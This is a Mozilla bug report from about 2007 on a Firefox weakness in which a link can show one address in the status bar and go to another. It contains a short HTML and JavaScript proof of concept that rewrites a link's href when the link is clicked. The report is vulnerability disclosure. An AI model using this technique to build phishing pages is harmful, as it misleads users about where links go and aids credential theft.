Closed
Bug 405324
Opened 17 years ago
Closed 17 years ago
Address of webpage in status bar could be faked, to make phishing attack more reliable
Categories
(Toolkit :: Safe Browsing, defect)
Tracking
()
RESOLVED
DUPLICATE
of bug 229050
People
(Reporter: yamashici, Unassigned)
References
()
Details
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.3) Gecko/20070208 Mandriva/2.0.0.3-2mdv2007.1 (2007.1) Firefox/2.0.0.3
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.3) Gecko/20070208 Mandriva/2.0.0.3-2mdv2007.1 (2007.1) Firefox/2.0.0.3
tested on WinXP with newest Firefox + Mandriva linux with Firefox 2.0.0.3
Reproducible: Always
Steps to Reproduce:
1.
2.
3.
source code - http://miki.udl.pl/tsu/upload/fakelink.html
<script>
function findLinkByHref(href) {
for (var i=0; i<document.links.length; i++) {if (document.links[i].href == href) return i;}return -1;
}
function changeLinkHref(id,newHref,oldHref) {
if (document.links.length > 0) { if (document.getElementById) {document.getElementById(id).href = newHref;} else if (document.all) {document.all[id].href = newHref;} else {var index = findLinkByHref(oldHref);if (index > -1) document.links[index].href = newHref;}}
}
function phish() {
changeLinkHref('fakelink', 'http://google.pl', 'phishing.html');
}
</script>
<a id='fakelink' href='phishing.html' onClick='javascript:phish();'>phish !</a>
Updated•17 years ago
|
Group: security
Status: UNCONFIRMED → RESOLVED
Closed: 17 years ago
Resolution: --- → DUPLICATE
Assignee | ||
Updated•11 years ago
|
Product: Firefox → Toolkit
You need to log in
before you can comment on or make changes to this bug.
Description
•